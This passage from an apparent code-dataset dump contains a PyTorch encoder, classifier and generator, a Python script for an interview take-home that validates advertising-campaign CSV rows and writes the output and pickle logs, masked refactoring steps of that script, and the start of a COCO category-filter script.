nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)\n self.bn2 = nn.BatchNorm2d(48)\n\n def forward(self, x):\n x = torch.mean(x, 1).view(x.size()[0], 1, x.size()[2], x.size()[3])\n x = F.max_pool2d(F.relu(self.bn1(self.conv1(x))), stride=2, kernel_size=2, dilation=(1, 1))\n x = F.max_pool2d(F.relu(self.bn2(self.conv2(x))), stride=2, kernel_size=2, dilation=(1, 1))\n #print(x.size())\n x = x.view(x.size(0), 48*4*4)\n return x\n\n\nclass Classifier(nn.Module):\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48*4*4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, 512, 4, 1, 0, bias=False),\n nn.BatchNorm2d(512),\n nn.ReLU(True),\n\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(512, 256, 3, 2, 1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(True),\n\n # state size. (ngf*2) x 8 x 8\n nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(True),\n\n # state size. (ngf) x 16 x 16\n nn.ConvTranspose2d(128, 1, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 32 x 32\n )\n\n def forward(self, x):\n # print(x.shape) # torch.Size([64, 100, 1, 1])\n x = self.network(x)\n # print(x.shape) # torch.Size([64, 1, 28, 28])\n\n return x\n\n",
"step-ids": [
5,
7,
8,
10,
11
]
}
|
[
5,
7,
8,
10,
11
] |
#Created by Jake Hansen for Zebra interview take home assessment, July 2020.
import csv, os, sys, pickle
from datetime import date
#Class For storing information about each file generally. Helpful for future
#use cases to remember the indicies from a file, if file has thousands of fields
#Also can be used as a log to store daily number of 'good' vs 'bad' rows
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
# getHeaderIndexes(indices, headers)
# Requires: Pre-populated indices dictionary, the header's row from a CSV file with
# naming convention conforming to the schema output from the directions
# Effects: Determines if file has the necessary colums to match the desired output
# schema
# Modifies: The indices variable, returning the correct indices within the csv row
def getHeaderIndexes(indices, headers):
counter = -1
a,b,c,d,e,f,g = False, False, False, False,False,False,False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if a == True and b == True and c == True and d == True and e == True and f == True and g == True:
valid = True
else:
valid = False
return indices, valid
# isRowValid(indices,row)
# Requires: a valid CSV file with columns necessary to match the expected output
# Effects: Determines if a single row should be added to the final output, or if
# the row is missing data / has incorrect data types for the field and thus
# will not be added to the output but instead printed out
# Modifies: N/A
def isRowValid(indices, row):
#String Non-Nullables
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':
pass
else:
return False
#Float Non Nullables
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
#String Nullables
sNs = ['Phone Number']
#No Check Required, because it can be nullable or a string. I do assume that
#it is required to have a "Phone Number" column, which is checked for in getHeaderIndexes
return True
# addUsableRow(indices, row, finalOutput)
# Requires: The row is known to follow the output schema as specificed in the requirements
# Effects: Adds row variables in the order specified in the output schema
# Modifies: the final output variable
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = '"'+ pn + '","' + cid + '","' + cpac + '","' + rl + '","' + phn + '","' + ad + '","' + zc + '"' + '\n'
finalOutput += temp
return finalOutput
# addErrorRow(indices, row, errorFinalOutput)
# Requires: The row does not follow the output schema
# Effects: adds the row to the error output variable that will be printed out
# Modifies: the error final output string which gets printed at the end of the daily
# job / procedure / script/ whatever The Zebra prefers to call these python data projects
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
#Variables and data structures
finalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\n'
errorFinalOutput = ''
# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
# pickelFileName = 'pickleTest/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {
"Provider Name": 0,
"CampaignID": 0,
"Cost Per Ad Click": 0,
"Redirect Link": 0,
"Phone Number": 0,
"Address": 0,
"Zipcode": 0
}
#InputFiles in list form
# inputList = [
# 'inputFilesTest/Auto.csv',
# 'inputFilesTest/Home.csv'
# ]
# InputFiles in a directory
inputDirectory = 'inputFiles'
#check if files are too large, or non-csv files
currentLines = 0
for file in os.listdir(inputDirectory):
# for file in inputList:
# currentLines += sum(1 for line in open(file))
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
#Main Algorithm loop through all files in the list
for file in os.listdir(inputDirectory):
# for file in inputList:
#usableRows and errorRows used for storing information from each data source
usableRows = 0
errorRows = 0
# with open(file, newline='') as f:
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent,row, finalOutput)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
f.close()
#Add dataSource Information for possible future needs and logging purposes
newDataSource = DataSource(file,usableRows, errorRows, indices)
dataSources.append(newDataSource)
#Create file with rows containing correct schema
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
#print the incorrect rows
print(errorFinalOutput)
#Create Pickel file containing data source info for daily logging
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
#Create Pickle File dictionary with indices specific info for filenames
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
#Thank you line
print("Thanks for taking the time to look at my code and consider me for this position. Cheers!")
|
normal
|
{
"blob_id": "38c1b82a29a5ad0b4581e63fb083ca2487a79817",
"index": 9544,
"step-1": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\n<mask token>\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-4": "import csv, os, sys, pickle\nfrom datetime import date\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-5": "#Created by Jake Hansen for Zebra interview take home assessment, July 2020.\nimport csv, os, sys, pickle\nfrom datetime import date\n\n#Class For storing information about each file generally. Helpful for future\n#use cases to remember the indicies from a file, if file has thousands of fields\n#Also can be used as a log to store daily number of 'good' vs 'bad' rows\nclass DataSource:\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n# getHeaderIndexes(indices, headers)\n# Requires: Pre-populated indices dictionary, the header's row from a CSV file with\n# naming convention conforming to the schema output from the directions\n# Effects: Determines if file has the necessary colums to match the desired output\n# schema\n# Modifies: The indices variable, returning the correct indices within the csv row\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a,b,c,d,e,f,g = False, False, False, False,False,False,False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if a == True and b == True and c == True and d == True and e == True and f == True and g == True:\n valid = True\n else:\n valid = False\n return indices, valid\n\n# isRowValid(indices,row)\n# Requires: a valid CSV file with columns necessary to match the expected output\n# Effects: Determines if a single row should be added to the final output, or if\n# the row is missing data / has incorrect data types for the field and thus\n# will not be added to the output but instead printed out\n# Modifies: N/A\ndef isRowValid(indices, row):\n #String Non-Nullables\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n\n #Float Non Nullables\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n\n #String Nullables\n sNs = ['Phone Number']\n #No Check Required, because it can be nullable or a string. I do assume that\n #it is required to have a \"Phone Number\" column, which is checked for in getHeaderIndexes\n\n return True\n\n# addUsableRow(indices, row, finalOutput)\n# Requires: The row is known to follow the output schema as specificed in the requirements\n# Effects: Adds row variables in the order specified in the output schema\n# Modifies: the final output variable\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n\n temp = '\"'+ pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' + phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n'\n finalOutput += temp\n return finalOutput\n\n# addErrorRow(indices, row, errorFinalOutput)\n# Requires: The row does not follow the output schema\n# Effects: adds the row to the error output variable that will be printed out\n# Modifies: the error final output string which gets printed at the end of the daily\n# job / procedure / script/ whatever The Zebra prefers to call these python data projects\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n#Variables and data structures\nfinalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\\n'\nerrorFinalOutput = ''\n# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\n# pickelFileName = 'pickleTest/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {\n \"Provider Name\": 0,\n \"CampaignID\": 0,\n \"Cost Per Ad Click\": 0,\n \"Redirect Link\": 0,\n \"Phone Number\": 0,\n \"Address\": 0,\n \"Zipcode\": 0\n}\n\n#InputFiles in list form\n# inputList = [\n# 'inputFilesTest/Auto.csv',\n# 'inputFilesTest/Home.csv'\n# ]\n\n# InputFiles in a directory\ninputDirectory = 'inputFiles'\n\n#check if files are too large, or non-csv files\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n # currentLines += sum(1 for line in open(file))\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\n\n#Main Algorithm loop through all files in the list\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n #usableRows and errorRows used for storing information from each data source\n usableRows = 0\n errorRows = 0\n # with open(file, newline='') as f:\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent,row, finalOutput)\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n\n f.close()\n #Add dataSource Information for possible future needs and logging purposes\n newDataSource = DataSource(file,usableRows, errorRows, indices)\n dataSources.append(newDataSource)\n\n#Create file with rows containing correct schema\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\n\n#print the incorrect rows\nprint(errorFinalOutput)\n\n#Create Pickel file containing data source info for daily logging\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\n\n#Create Pickle File dictionary with indices specific info for filenames\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\n\n#Thank you line\nprint(\"Thanks for taking the time to look at my code and consider me for this position. Cheers!\")\n",
"step-ids": [
5,
6,
8,
9,
10
]
}
|
[
5,
6,
8,
9,
10
] |
import json
import sys
from copy import deepcopy
from argparse import ArgumentParser
# TODO: Ord category's IDs after deletion
def return_cat_name(json_coco, category):
"""Return the category name of a category ID
Arguments:
json_coco {dict} -- json dict file from coco file
category {int} -- category ID
Returns:
string -- category name
Raises:
KeyError: Category ID not found
"""
for cat in json_coco['categories']:
if cat['id'] == category:
return cat['name']
print("Categoria não encontrada: ", category)
sys.exit()
def main():
"""Remove a category from a coco json file
"""
parser = ArgumentParser(
description='Category Filter: Filter a List of Categories from a JSON')
parser.add_argument('json_file_path', help='JSON file path')
parser.add_argument('out_file', help='Output filename')
args = parser.parse_args()
ann_file = open(args.json_file_path)
